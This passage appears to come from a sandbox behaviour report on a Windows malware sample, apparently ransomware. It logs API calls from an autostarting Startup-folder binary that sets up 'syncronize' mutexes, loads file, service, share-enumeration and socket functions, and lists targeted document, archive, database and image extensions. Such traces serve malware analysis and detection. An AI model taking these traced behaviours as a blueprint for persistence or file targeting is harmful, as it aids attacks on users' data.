_String2="USERPRO", _MaxCount=0x7) returned -18 [0180.424] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0180.424] GetProcessHeap () returned 0x1e82e4b0000 [0180.424] RtlFreeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, BaseAddress=0x1e82e4b1a40) returned 1 [0180.424] GetProcessHeap () returned 0x1e82e4b0000 [0180.424] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x12) returned 0x1e82e4b1a40 [0180.424] _get_osfhandle (_FileHandle=1) returned 0x254 [0180.424] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0180.424] _get_osfhandle (_FileHandle=0) returned 0x248 [0180.424] SetConsoleMode (hConsoleHandle=0x248, dwMode=0x0) returned 0 [0180.424] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x33a02ff300*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x33a02ff2d8 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x33a02ff2d8*(hProcess=0x9c, hThread=0x98, dwProcessId=0x1040, dwThreadId=0x1054)) returned 1 [0190.075] CloseHandle (hObject=0x98) returned 1 [0190.075] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0190.075] GetProcessHeap () returned 0x1e82e4b0000 [0190.075] RtlFreeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, BaseAddress=0x1e82e4b8500) returned 1 [0190.075] GetEnvironmentStringsW () returned 0x1e82e4b8500* [0190.075] GetProcessHeap () returned 0x1e82e4b0000 [0190.075] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0xacc) returned 0x1e82e4cb7a0 [0190.076] FreeEnvironmentStringsA (penv="=") returned 1 [0190.076] LoadLibraryExW (lpLibFileName="NTDLL.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffcea380000 [0190.076] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQueryInformationProcess") returned 0x7ffcea4256b0 [0190.076] NtQueryInformationProcess (in: ProcessHandle=0x9c, ProcessInformationClass=0x0, ProcessInformation=0x33a02fe7d8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x33a02fe7d8, ReturnLength=0x0) returned 0x0 [0190.076] ReadProcessMemory (in: hProcess=0x9c, lpBaseAddress=0x14417ba000, lpBuffer=0x33a02fe810, nSize=0x7a0, lpNumberOfBytesRead=0x33a02fe7d0 | out: lpBuffer=0x33a02fe810*, lpNumberOfBytesRead=0x33a02fe7d0*=0x7a0) returned 1 [0190.088] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) Thread: id = 24 os_tid = 0xc90 Thread: id = 28 os_tid = 0x1250 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf3d1000" os_pid = "0x1140" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x1160" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 14 os_tid = 0xff0 Thread: id = 15 os_tid = 0x7f0 Thread: id = 16 os_tid = 0xd58 Thread: id = 22 os_tid = 0x13e0 Thread: id = 23 os_tid = 0xafc Process: id = "4" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0xee1e000" os_pid = "0x1040" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x1160" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0x1054 Thread: id = 29 os_tid = 0x124c Thread: id = 30 os_tid = 0x1350 Process: id = "5" image_name = "wdgmug.exe" filename = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe" page_root = "0x3a419000" os_pid = "0xdd0" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0xa24" cmd_line = "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe\" " cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001684b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 31 os_tid = 0xdd4 [0278.845] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77a50000 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="GetProcAddress") returned 0x77a651b0 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="GetModuleHandleW") returned 0x77a650d0 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="FindNextFileW") returned 0x77abee40 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="FindClose") returned 0x77abed70 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="MoveFileW") returned 0x77a9e500 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="GetFileSizeEx") returned 0x77abef40 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="GetModuleFileNameW") returned 0x77a65090 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="GetFileAttributesW") returned 0x77abef10 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="ExitProcess") returned 0x77a63cb0 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="GetCommandLineW") returned 0x77a64cc0 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="GetComputerNameW") returned 0x77a932c0 [0278.846] GetProcAddress (hModule=0x77a50000, lpProcName="GetComputerNameA") returned 0x77a93780 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="CreateMutexW") returned 0x77abeb70 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="lstrlenW") returned 0x77a66c70 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="lstrlenA") returned 0x77a66c50 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="GetCurrentProcess") returned 0x77abea10 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="WaitForSingleObject") returned 0x77abeca0 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="GetLogicalDrives") returned 0x77a60d20 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="GetTickCount") returned 0x77abdd50 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="DeleteFileW") returned 0x77abed40 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="WideCharToMultiByte") returned 0x77a66b10 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x77abebb0 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="Sleep") returned 0x77a66760 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="LeaveCriticalSection") returned 0x77b6b250 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="ReadFile") returned 0x77abf090 [0278.847] GetProcAddress (hModule=0x77a50000, lpProcName="CreateFileW") returned 0x77abed10 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="OpenMutexW") returned 0x77abebf0 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="EnterCriticalSection") returned 0x77b6b2d0 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="WaitForMultipleObjects") returned 0x77abec80 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="lstrcmpiW") returned 0x77a66bf0 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="lstrcmpiA") returned 0x77a66bd0 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="DeleteCriticalSection") returned 0x77b4fb90 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="ReleaseMutex") returned 0x77abec20 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="CloseHandle") returned 0x77abeab0 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="GetVersion") returned 0x77a656c0 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="CreateThread") returned 0x77a646b0 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="ExpandEnvironmentStringsW") returned 0x77a64a40 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="QueryPerformanceCounter") returned 0x77a65da0 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="QueryPerformanceFrequency") returned 0x77a65dc0 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="GetCurrentProcessId") returned 0x77abea20 [0278.848] GetProcAddress (hModule=0x77a50000, lpProcName="SetFileAttributesW") returned 0x77abf100 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="GetVolumeInformationW") returned 0x77abf020 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="WriteFile") returned 0x77abf180 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="SetFilePointerEx") returned 0x77abf130 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="SetEndOfFile") returned 0x77abf0e0 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="FindFirstFileW") returned 0x77abedf0 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="GetProcessHeap") returned 0x77a651f0 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="HeapReAlloc") returned 0x77b5f630 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="HeapAlloc") returned 0x77b62dc0 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="HeapFree") returned 0x77a657f0 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="CreatePipe") returned 0x77a64590 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="SetHandleInformation") returned 0x77abeae0 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="CreateProcessW") returned 0x77a64610 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="CompareStringW") returned 0x77a64430 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="CompareStringA") returned 0x77a64410 [0278.849] GetProcAddress (hModule=0x77a50000, lpProcName="OpenProcess") returned 0x77a65cc0 [0278.850] GetProcAddress (hModule=0x77a50000, lpProcName="TerminateProcess") returned 0x77a667e0 [0278.850] GetProcAddress (hModule=0x77a50000, lpProcName="GetSystemTime") returned 0x77a654e0 [0278.850] GetProcAddress (hModule=0x77a50000, lpProcName="SystemTimeToFileTime") returned 0x77a667a0 [0278.850] GetProcAddress (hModule=0x77a50000, lpProcName="GetLastError") returned 0x77a65010 [0278.850] GetProcAddress (hModule=0x77a50000, lpProcName="CreateToolhelp32Snapshot") returned 0x77a9edc0 [0278.850] GetProcAddress (hModule=0x77a50000, lpProcName="Process32NextW") returned 0x77a9f8f0 [0278.850] GetProcAddress (hModule=0x77a50000, lpProcName="Process32FirstW") returned 0x77a9f750 [0278.850] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77510000 [0279.030] GetProcAddress (hModule=0x77510000, lpProcName="RegOpenKeyExW") returned 0x7752e580 [0279.031] GetProcAddress (hModule=0x77510000, lpProcName="RegQueryValueExW") returned 0x7752e5a0 [0279.031] GetProcAddress (hModule=0x77510000, lpProcName="RegSetValueExW") returned 0x7752f530 [0279.031] GetProcAddress (hModule=0x77510000, lpProcName="RegCloseKey") returned 0x7752ed60 [0279.031] GetProcAddress (hModule=0x77510000, lpProcName="OpenProcessToken") returned 0x7752efb0 [0279.031] GetProcAddress (hModule=0x77510000, lpProcName="GetTokenInformation") returned 0x7752ee90 [0279.031] GetProcAddress (hModule=0x77510000, lpProcName="OpenSCManagerW") returned 0x77530540 [0279.031] GetProcAddress (hModule=0x77510000, lpProcName="OpenServiceW") returned 0x7752fa20 [0279.032] GetProcAddress (hModule=0x77510000, lpProcName="CloseServiceHandle") returned 0x7752fc00 [0279.032] GetProcAddress (hModule=0x77510000, lpProcName="ControlService") returned 0x775426d0 [0279.032] GetProcAddress (hModule=0x77510000, lpProcName="QueryServiceStatus") returned 0x77532380 [0279.032] GetProcAddress (hModule=0x77510000, lpProcName="EnumDependentServicesW") returned 0x77542f70 [0279.032] GetProcAddress (hModule=0x77510000, lpProcName="EnumServicesStatusExW") returned 0x7752fc80 [0279.032] LoadLibraryA (lpLibFileName="user32.dll") returned 0x75450000 [0279.185] GetProcAddress (hModule=0x75450000, lpProcName="SystemParametersInfoW") returned 0x7547f210 [0279.185] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x761c0000 [0279.555] GetProcAddress (hModule=0x761c0000, lpProcName="ShellExecuteExW") returned 0x76324730 [0279.556] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77b20000 [0279.556] GetProcAddress (hModule=0x77b20000, lpProcName="NtQuerySystemInformation") returned 0x77b92070 [0279.556] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74520000 [0279.575] GetProcAddress (hModule=0x74520000, lpProcName="WNetCloseEnum") returned 0x74522640 [0279.575] GetProcAddress (hModule=0x74520000, lpProcName="WNetOpenEnumW") returned 0x74522790 [0279.575] GetProcAddress (hModule=0x74520000, lpProcName="WNetEnumResourceW") returned 0x74522410 [0279.575] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x779d0000 [0279.586] GetProcAddress (hModule=0x779d0000, lpProcName="WSAStartup") returned 0x779d5b40 [0279.586] GetProcAddress (hModule=0x779d0000, lpProcName="socket") returned 0x779e4510 [0279.586] GetProcAddress (hModule=0x779d0000, lpProcName="send") returned 0x779d5030 [0279.586] GetProcAddress (hModule=0x779d0000, lpProcName="recv") returned 0x779e0c50 [0279.587] GetProcAddress (hModule=0x779d0000, lpProcName="connect") returned 0x779d5410 [0279.587] GetProcAddress (hModule=0x779d0000, lpProcName="closesocket") returned 0x779e0910 [0279.587] GetProcAddress (hModule=0x779d0000, lpProcName="gethostbyname") returned 0x77a06cb0 [0279.587] GetProcAddress (hModule=0x779d0000, lpProcName="inet_addr") returned 0x779e9160 [0279.587] GetProcAddress (hModule=0x779d0000, lpProcName="ntohl") returned 0x779d49d0 [0279.587] GetProcAddress (hModule=0x779d0000, lpProcName="htonl") returned 0x779d49d0 [0279.587] GetProcAddress (hModule=0x779d0000, lpProcName="htons") returned 0x779e8ff0 [0279.587] GetProcessHeap () returned 0x470000 [0279.588] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x47ae38 [0279.588] QueryPerformanceCounter (in: lpPerformanceCount=0x19fdb0 | out: lpPerformanceCount=0x19fdb0*=8404950581) returned 1 [0279.588] GetTickCount () returned 0x113f0af [0279.588] GetCurrentProcessId () returned 0xdd0 [0279.591] GetTickCount () returned 0x113f0af [0279.591] GetTickCount () returned 0x113f0af [0279.592] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x47ae60 [0279.592] GetVersion () returned 0x23f00206 [0279.592] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x7) returned 0x486cb0 [0279.592] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x488010 [0279.592] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x488010, Size=0x20) returned 0x47ae88 [0279.592] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47ae88, Size=0x40) returned 0x487478 [0279.592] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x48d850 [0279.592] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_2KXQ81A") returned 0x0 [0279.593] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_2KXQ81A") returned 0x1ec [0279.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486cb0 | out: hHeap=0x470000) returned 1 [0279.593] lstrlenW (lpString="Global\\syncronize_") returned 18 [0279.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x487478 | out: hHeap=0x470000) returned 1 [0279.593] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x7) returned 0x486e50 [0279.593] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x488010 [0279.593] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x488010, Size=0x20) returned 0x47ae88 [0279.593] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47ae88, Size=0x40) returned 0x487aa8 [0279.593] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x49d858 [0279.594] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_2KXQ81U") returned 0x0 [0279.594] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_2KXQ81U") returned 0x1f0 [0279.594] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486e50 | out: hHeap=0x470000) returned 1 [0279.594] lstrlenW (lpString="Global\\syncronize_") returned 18 [0279.594] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x487aa8 | out: hHeap=0x470000) returned 1 [0279.594] GetVersion () returned 0x23f00206 [0279.594] GetCurrentProcess () returned 0xffffffff [0279.594] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fd9c | out: TokenHandle=0x19fd9c*=0x1f4) returned 1 [0279.594] GetTokenInformation (in: TokenHandle=0x1f4, TokenInformationClass=0x14, TokenInformation=0x19fd98, TokenInformationLength=0x4, ReturnLength=0x19fda4 | out: TokenInformation=0x19fd98, ReturnLength=0x19fda4) returned 1 [0279.594] CloseHandle (hObject=0x1f4) returned 1 [0279.594] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x0 [0279.594] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x486210 [0279.595] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x487f50 [0279.595] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487f50, Size=0x20) returned 0x47ae88 [0279.595] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47ae88, Size=0x40) returned 0x487358 [0279.595] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487358, Size=0x80) returned 0x4826a0 [0279.595] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4826a0, Size=0x100) returned 0x487c10 [0279.595] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x34) returned 0x48a330 [0279.595] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x486e50 [0279.595] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x486cd0 [0279.595] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x486cb0 [0279.595] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x487e78 [0279.595] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x486cc0 [0279.595] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x487f50 [0279.595] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x486cc0, Size=0x8) returned 0x486ce0 [0279.595] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x487ef0 [0279.595] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x486ce0, Size=0x10) returned 0x488010 [0279.595] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x487e90 [0279.595] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x487ec0 [0279.595] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x488010, Size=0x20) returned 0x47ae88 [0279.596] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x487ed8 [0279.596] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x487f08 [0279.596] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x486e50, Size=0x8) returned 0x486d20 [0279.596] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x486cd0, Size=0x8) returned 0x486e50 [0279.596] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x486cc0 [0279.596] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x487f20 [0279.596] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x486cd0 [0279.596] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x488010 [0279.596] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x486cd0, Size=0x8) returned 0x486ce0 [0279.596] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x488100 [0279.596] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x486ce0, Size=0x10) returned 0x4880e8 [0279.596] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x488118 [0279.596] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x486cd0 [0279.596] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4880e8, Size=0x20) returned 0x4add68 [0279.596] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x486d20, Size=0x10) returned 0x488130 [0279.596] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x486e50, Size=0x10) returned 0x488070 [0279.596] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x486e50 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x488088 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x486ce0 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4880a0 [0279.597] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x486ce0, Size=0x8) returned 0x486d00 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x486ce0 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4880b8 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x486d20 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4880d0 [0279.597] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x486d20, Size=0x8) returned 0x4ae1d8 [0279.597] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x488130, Size=0x20) returned 0x4adbb0 [0279.597] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x488070, Size=0x20) returned 0x4adc50 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae158 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4880e8 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x4ae148 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x488130 [0279.597] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae148, Size=0x8) returned 0x4ae1e8 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4861f0 [0279.597] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4863d0 [0279.597] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0279.597] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x487c10 | out: hHeap=0x470000) returned 1 [0279.597] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fde8 | out: lpWSAData=0x19fde8) returned 0 [0279.606] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x488070 [0279.606] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x488070, Size=0x20) returned 0x4ad9a8 [0279.606] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ad9a8, Size=0x40) returned 0x487358 [0279.606] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487358, Size=0x80) returned 0x488578 [0279.606] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x488578, Size=0x100) returned 0x488578 [0279.606] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x488070 [0279.606] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x488070, Size=0x20) returned 0x4ad9a8 [0279.607] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ad9a8, Size=0x40) returned 0x487a18 [0279.607] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487a18, Size=0x80) returned 0x4b2fe8 [0279.607] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b2fe8, Size=0x100) returned 0x4b2fe8 [0279.607] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x488070 [0279.607] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x4ae198 [0279.607] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3300 [0279.607] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae198, Size=0x8) returned 0x4ae188 [0279.607] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x486410 [0279.607] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae188, Size=0x10) returned 0x4b3168 [0279.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4860d0 [0279.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1a) returned 0x4ada48 [0279.608] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3168, Size=0x20) returned 0x4ad890 [0279.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4ada70 [0279.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x16) returned 0x486230 [0279.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1a) returned 0x4adbd8 [0279.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b3228 [0279.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x4ae168 [0279.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x4877d8 [0279.608] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae168, Size=0x8) returned 0x4ae238 [0279.608] RtlAllocateHeap 